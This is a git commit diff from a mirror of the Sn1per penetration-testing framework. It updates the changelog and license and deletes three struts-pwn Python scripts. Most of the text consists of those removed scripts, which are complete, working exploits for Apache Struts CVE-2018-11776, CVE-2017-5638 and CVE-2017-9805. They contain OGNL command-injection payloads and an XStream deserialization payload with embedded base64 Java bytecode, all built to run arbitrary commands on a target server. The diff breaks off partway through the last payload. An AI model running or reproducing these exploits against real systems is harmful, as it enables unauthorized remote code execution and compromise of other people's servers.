mirror of https://github.com/1N3/Sn1per.git
Sn1per Community Edition by @xer0dayz - https://xerosecurity.com
This commit is contained in:
parent
f532cad30b
commit
f43e0658ef
20
CHANGELOG.md
20
CHANGELOG.md
|
|
@ -1,22 +1,18 @@
|
|||
## CHANGELOG:
|
||||
* v6.1 - Added automated web scanning via Burpsuite Pro 2.x API for all 'web' mode scans
|
||||
* v6.1 - Added Waybackmachine URL retrieval to all web scans
|
||||
* v6.1 - Added Elasticsearch Kibana Console LFI CVE-2018-17246 vuln check
|
||||
* v6.1 - Added 4 levels of brute forcing to all web mode scans
|
||||
* v6.1 - Added configurable options for ALL scan plugins and options in Sn1per
|
||||
* v6.1 - Added logging for ALL tools and exploits
|
||||
* v6.1 - Added NMap latest Github repo to install.sh to fix issue with LUA libs
|
||||
* v6.1 - Converted all exploits to Metasploit
|
||||
* v6.1 - Added configuration options to set LHOST/LPORT for all Metasploit exploits in sniper.conf
|
||||
* v6.1 - Added improved web brute forcing dictionaries for all scan modes
|
||||
* v6.1 - Added individual logging for all tools under the loot directory
|
||||
* v6.1 - Added new sniper.conf options to enabled/disable all plugins and change settings per user
|
||||
* v6.1 - Fixed issue with CMSMap install/usage
|
||||
* v6.1 - Fixed issue with WPScan gem dependency missing (public_suffix)
|
||||
* v6.1 - Fixed timeout setting in cutycapt
|
||||
* v6.1 - Fixed script errors with CVE-2018-15473 sshUsernameEnumExploit.py
|
||||
* v6.1 - Improved SSLyze scan options
|
||||
* v6.1 - Updated domain list used by Aquatone
|
||||
* v6.1 - Removed http-vuln-cve2017-5638.nse script due to outdated NMap libs
|
||||
* v6.1 - Removed serializekiller plugin from install.sh
|
||||
* v6.1 - Removed cansina plugin from install.sh
|
||||
* v6.1 - Removed testssll.sh plugin from install.sh
|
||||
* v6.1 - Fixed issue with theharvester not running correctly
|
||||
* v6.1 - Fixed issue with Amass not running due to invalid command line options in latest release
|
||||
* v6.1 - Fixed issue with Sn1per Professional notepad.html missing
|
||||
* v6.1 - Cleaned up plugins and install dependencies list
|
||||
* v6.0 - Improved scan options for discover mode scans
|
||||
* v6.0 - Fixed issue with pip3 dependency package missing
|
||||
* v6.0 - Removed iceweasel from install.sh to fix apt error
|
||||
|
|
|
|||
|
|
@ -1,2 +1,2 @@
|
|||
## LICENSE:
|
||||
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.
|
||||
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.
|
||||
|
|
@ -1,226 +0,0 @@
|
|||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
|
||||
# Author:
|
||||
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
|
||||
# This code uses a payload from:
|
||||
# https://github.com/jas502n/St2-057
|
||||
# *****************************************************
|
||||
|
||||
import argparse
|
||||
import random
|
||||
import requests
|
||||
import sys
|
||||
try:
|
||||
from urllib import parse as urlparse
|
||||
except ImportError:
|
||||
import urlparse
|
||||
|
||||
# Disable SSL warnings
|
||||
try:
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if len(sys.argv) <= 1:
|
||||
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
|
||||
print('[*] Struts-PWN - @mazen160')
|
||||
print('\n%s -h for help.' % (sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url",
|
||||
dest="url",
|
||||
help="Check a single URL.",
|
||||
action='store')
|
||||
parser.add_argument("-l", "--list",
|
||||
dest="usedlist",
|
||||
help="Check a list of URLs.",
|
||||
action='store')
|
||||
parser.add_argument("-c", "--cmd",
|
||||
dest="cmd",
|
||||
help="Command to execute. (Default: 'id')",
|
||||
action='store',
|
||||
default='id')
|
||||
parser.add_argument("--exploit",
|
||||
dest="do_exploit",
|
||||
help="Exploit.",
|
||||
action='store_true')
|
||||
|
||||
|
||||
args = parser.parse_args()
|
||||
url = args.url if args.url else None
|
||||
usedlist = args.usedlist if args.usedlist else None
|
||||
cmd = args.cmd if args.cmd else None
|
||||
do_exploit = args.do_exploit if args.do_exploit else None
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
timeout = 3
|
||||
|
||||
|
||||
def parse_url(url):
|
||||
"""
|
||||
Parses the URL.
|
||||
"""
|
||||
|
||||
# url: http://example.com/demo/struts2-showcase/index.action
|
||||
|
||||
url = url.replace('#', '%23')
|
||||
url = url.replace(' ', '%20')
|
||||
|
||||
if ('://' not in url):
|
||||
url = str("http://") + str(url)
|
||||
scheme = urlparse.urlparse(url).scheme
|
||||
|
||||
# Site: http://example.com
|
||||
site = scheme + '://' + urlparse.urlparse(url).netloc
|
||||
|
||||
# FilePath: /demo/struts2-showcase/index.action
|
||||
file_path = urlparse.urlparse(url).path
|
||||
if (file_path == ''):
|
||||
file_path = '/'
|
||||
|
||||
# Filename: index.action
|
||||
try:
|
||||
filename = url.split('/')[-1]
|
||||
except IndexError:
|
||||
filename = ''
|
||||
|
||||
# File Dir: /demo/struts2-showcase/
|
||||
file_dir = file_path.rstrip(filename)
|
||||
if (file_dir == ''):
|
||||
file_dir = '/'
|
||||
|
||||
return({"site": site,
|
||||
"file_dir": file_dir,
|
||||
"filename": filename})
|
||||
|
||||
|
||||
def build_injection_inputs(url):
|
||||
"""
|
||||
Builds injection inputs for the check.
|
||||
"""
|
||||
|
||||
parsed_url = parse_url(url)
|
||||
injection_inputs = []
|
||||
url_directories = parsed_url["file_dir"].split("/")
|
||||
|
||||
try:
|
||||
url_directories.remove("")
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
for i in range(len(url_directories)):
|
||||
injection_entry = "/".join(url_directories[:i])
|
||||
|
||||
if not injection_entry.startswith("/"):
|
||||
injection_entry = "/%s" % (injection_entry)
|
||||
|
||||
if not injection_entry.endswith("/"):
|
||||
injection_entry = "%s/" % (injection_entry)
|
||||
|
||||
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
|
||||
injection_entry += parsed_url["filename"]
|
||||
|
||||
injection_inputs.append(injection_entry)
|
||||
|
||||
return(injection_inputs)
|
||||
|
||||
|
||||
def check(url):
|
||||
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
|
||||
multiplication_value = random_value * random_value
|
||||
injection_points = build_injection_inputs(url)
|
||||
parsed_url = parse_url(url)
|
||||
print("[%] Checking for CVE-2018-11776")
|
||||
print("[*] URL: %s" % (url))
|
||||
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
|
||||
attempts_counter = 0
|
||||
|
||||
for injection_point in injection_points:
|
||||
attempts_counter += 1
|
||||
print("[%s/%s]" % (attempts_counter, len(injection_points)))
|
||||
testing_url = "%s%s" % (parsed_url["site"], injection_point)
|
||||
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
|
||||
try:
|
||||
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
continue
|
||||
if "Location" in resp.headers.keys():
|
||||
if str(multiplication_value) in resp.headers['Location']:
|
||||
print("[*] Status: Vulnerable!")
|
||||
return(injection_point)
|
||||
print("[*] Status: Not Affected.")
|
||||
return(None)
|
||||
|
||||
|
||||
def exploit(url, cmd):
|
||||
parsed_url = parse_url(url)
|
||||
|
||||
injection_point = check(url)
|
||||
if injection_point is None:
|
||||
print("[%] Target is not vulnerable.")
|
||||
return(0)
|
||||
print("[%] Exploiting...")
|
||||
|
||||
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
|
||||
|
||||
testing_url = "%s%s" % (parsed_url["site"], injection_point)
|
||||
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
|
||||
|
||||
try:
|
||||
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
return(1)
|
||||
|
||||
print("[%] Response:")
|
||||
print(resp.text)
|
||||
return(0)
|
||||
|
||||
|
||||
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
|
||||
if url:
|
||||
if not do_exploit:
|
||||
check(url)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
|
||||
if usedlist:
|
||||
URLs_List = []
|
||||
try:
|
||||
f_file = open(str(usedlist), "r")
|
||||
URLs_List = f_file.read().replace("\r", "").split("\n")
|
||||
try:
|
||||
URLs_List.remove("")
|
||||
except ValueError:
|
||||
pass
|
||||
f_file.close()
|
||||
except Exception as e:
|
||||
print("Error: There was an error in reading list file.")
|
||||
print("Exception: " + str(e))
|
||||
exit(1)
|
||||
for url in URLs_List:
|
||||
if not do_exploit:
|
||||
check(url)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
|
||||
print("[%] Done.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
|
||||
except KeyboardInterrupt:
|
||||
print("\nKeyboardInterrupt Detected.")
|
||||
print("Exiting...")
|
||||
exit(0)
|
||||
|
|
@ -1,176 +0,0 @@
|
|||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# struts-pwn: Apache Struts CVE-2017-5638 Exploit
|
||||
# Author:
|
||||
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
|
||||
# This code is based on:
|
||||
# https://www.exploit-db.com/exploits/41570/
|
||||
# https://www.seebug.org/vuldb/ssvid-92746
|
||||
# *****************************************************
|
||||
import sys
|
||||
import random
|
||||
import requests
|
||||
import argparse
|
||||
|
||||
# Disable SSL warnings
|
||||
try:
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
except:
|
||||
pass
|
||||
|
||||
if len(sys.argv) <= 1:
|
||||
print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
|
||||
print('[*] Struts-PWN - @mazen160')
|
||||
print('\n%s -h for help.' % (sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url",
|
||||
dest="url",
|
||||
help="Check a single URL.",
|
||||
action='store')
|
||||
parser.add_argument("-l", "--list",
|
||||
dest="usedlist",
|
||||
help="Check a list of URLs.",
|
||||
action='store')
|
||||
parser.add_argument("-c", "--cmd",
|
||||
dest="cmd",
|
||||
help="Command to execute. (Default: id)",
|
||||
action='store',
|
||||
default='id')
|
||||
parser.add_argument("--check",
|
||||
dest="do_check",
|
||||
help="Check if a target is vulnerable.",
|
||||
action='store_true')
|
||||
args = parser.parse_args()
|
||||
url = args.url if args.url else None
|
||||
usedlist = args.usedlist if args.usedlist else None
|
||||
url = args.url if args.url else None
|
||||
cmd = args.cmd if args.cmd else None
|
||||
do_check = args.do_check if args.do_check else None
|
||||
|
||||
|
||||
def url_prepare(url):
|
||||
url = url.replace('#', '%23')
|
||||
url = url.replace(' ', '%20')
|
||||
if ('://' not in url):
|
||||
url = str('http') + str('://') + str(url)
|
||||
return(url)
|
||||
|
||||
|
||||
def exploit(url, cmd):
|
||||
url = url_prepare(url)
|
||||
print('\n[*] URL: %s' % (url))
|
||||
print('[*] CMD: %s' % (cmd))
|
||||
|
||||
payload = "%{(#_='multipart/form-data')."
|
||||
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
||||
payload += "(#_memberAccess?"
|
||||
payload += "(#_memberAccess=#dm):"
|
||||
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
||||
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
||||
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
|
||||
payload += "(#ognlUtil.getExcludedClasses().clear())."
|
||||
payload += "(#context.setMemberAccess(#dm))))."
|
||||
payload += "(#cmd='%s')." % cmd
|
||||
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
||||
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
|
||||
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
|
||||
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
|
||||
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
|
||||
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
||||
payload += "(#ros.flush())}"
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Content-Type': str(payload),
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 3
|
||||
try:
|
||||
output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
output = 'ERROR'
|
||||
return(output)
|
||||
|
||||
|
||||
def check(url):
|
||||
url = url_prepare(url)
|
||||
print('\n[*] URL: %s' % (url))
|
||||
|
||||
random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
|
||||
|
||||
payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
|
||||
payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Content-Type': str(payload),
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 3
|
||||
try:
|
||||
resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
|
||||
result = True
|
||||
else:
|
||||
result = False
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
result = False
|
||||
return(result)
|
||||
|
||||
|
||||
def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
|
||||
if url:
|
||||
if do_check:
|
||||
result = check(url) # Only check for existence of Vulnerablity
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
else:
|
||||
output = exploit(url, cmd) # Exploit
|
||||
print(output)
|
||||
|
||||
if usedlist:
|
||||
URLs_List = []
|
||||
try:
|
||||
f_file = open(str(usedlist), 'r')
|
||||
URLs_List = f_file.read().replace('\r', '').split('\n')
|
||||
try:
|
||||
URLs_List.remove('')
|
||||
except ValueError:
|
||||
pass
|
||||
f_file.close()
|
||||
except:
|
||||
print('Error: There was an error in reading list file.')
|
||||
exit(1)
|
||||
for url in URLs_List:
|
||||
if do_check:
|
||||
result = check(url) # Only check for existence of Vulnerablity
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
else:
|
||||
output = exploit(url, cmd) # Exploit
|
||||
print(output)
|
||||
|
||||
print('[%] Done.')
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
|
||||
except KeyboardInterrupt:
|
||||
print('\nKeyboardInterrupt Detected.')
|
||||
print('Exiting...')
|
||||
exit(0)
|
||||
|
|
@ -1,324 +0,0 @@
|
|||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# struts-pwn: Apache Struts CVE-2017-9805 Exploit
|
||||
# Author:
|
||||
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
|
||||
# This code is based on:
|
||||
# https://github.com/rapid7/metasploit-framework/pull/8924
|
||||
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
|
||||
# *****************************************************
|
||||
import argparse
|
||||
import requests
|
||||
import sys
|
||||
|
||||
# Disable SSL warnings
|
||||
try:
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if len(sys.argv) <= 1:
|
||||
print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
|
||||
print('[*] Struts-PWN - @mazen160')
|
||||
print('\n%s -h for help.' % (sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url",
|
||||
dest="url",
|
||||
help="Check a single URL.",
|
||||
action='store')
|
||||
parser.add_argument("-l", "--list",
|
||||
dest="usedlist",
|
||||
help="Check a list of URLs.",
|
||||
action='store')
|
||||
parser.add_argument("-c", "--cmd",
|
||||
dest="cmd",
|
||||
help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
|
||||
action='store',
|
||||
default='echo test > /tmp/struts-pwn')
|
||||
parser.add_argument("--exploit",
|
||||
dest="do_exploit",
|
||||
help="Exploit.",
|
||||
action='store_true')
|
||||
args = parser.parse_args()
|
||||
url = args.url if args.url else None
|
||||
usedlist = args.usedlist if args.usedlist else None
|
||||
url = args.url if args.url else None
|
||||
cmd = args.cmd if args.cmd else None
|
||||
do_exploit = args.do_exploit if args.do_exploit else None
|
||||
|
||||
|
||||
def url_prepare(url):
|
||||
url = url.replace('#', '%23')
|
||||
url = url.replace(' ', '%20')
|
||||
if ('://' not in url):
|
||||
url = str('http') + str('://') + str(url)
|
||||
return(url)
|
||||
|
||||
|
||||
def exploit(url, cmd, dont_print_status_on_console=False):
|
||||
url = url_prepare(url)
|
||||
if dont_print_status_on_console is False:
|
||||
print('\n[*] URL: %s' % (url))
|
||||
print('[*] CMD: %s' % (cmd))
|
||||
cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
|
||||
|
||||
payload = """
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="java.lang.ProcessBuilder">
|
||||
<command>
|
||||
{0}
|
||||
</command>
|
||||
<redirectErrorStream>false</redirectErrorStream>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>java.lang.ProcessBuilder</class>
|
||||
<name>start</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
""".format(cmd)
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Referer': str(url),
|
||||
'Content-Type': 'application/xml',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 3
|
||||
try:
|
||||
output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
output = 'ERROR'
|
||||
return(output)
|
||||
|
||||
|
||||
def check(url):
|
||||
url = url_prepare(url)
|
||||
print('\n[*] URL: %s' % (url))
|
||||
|
||||
initial_request = exploit(url, "", dont_print_status_on_console=True)
|
||||
if initial_request == "ERROR":
|
||||
result = False
|
||||
print("The host does not respond as expected.")
|
||||
return(result)
|
||||
|
||||
payload_sleep_based_10seconds = """
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
|
||||
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
|
||||
<default>
|
||||
<__name>Pwnr</__name>
|
||||
<__bytecodes>
|
||||
<byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
|
||||
dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
|
||||
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
|
||||
bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
|
||||
bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
|
||||
c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
|
||||
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
|
||||
YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
|
||||
eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
|
||||
cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
|
||||
L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
|
||||
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
|
||||
KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
|
||||
eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
|
||||
L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
|
||||
amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
|
||||
ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
|
||||
bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
|
||||
YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
|
||||
L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
|
||||
BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
|
||||
MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
|
||||
AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
|
||||
AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
|
||||
AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
|
||||
AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
|
||||
AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
|
||||
AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
|
||||
</byte-array>
|
||||
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
|
||||
dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
|
||||
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
|
||||
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
|
||||
YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
|
||||
bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
|
||||
bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
|
||||
AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
|
||||
AAoAAQACABYAEAAJ</byte-array>
|
||||
</__bytecodes>
|
||||
<__transletIndex>-1</__transletIndex>
|
||||
<__indentNumber>0</__indentNumber>
|
||||
</default>
|
||||
<boolean>false</boolean>
|
||||
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
|
||||
<name>newTransformer</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
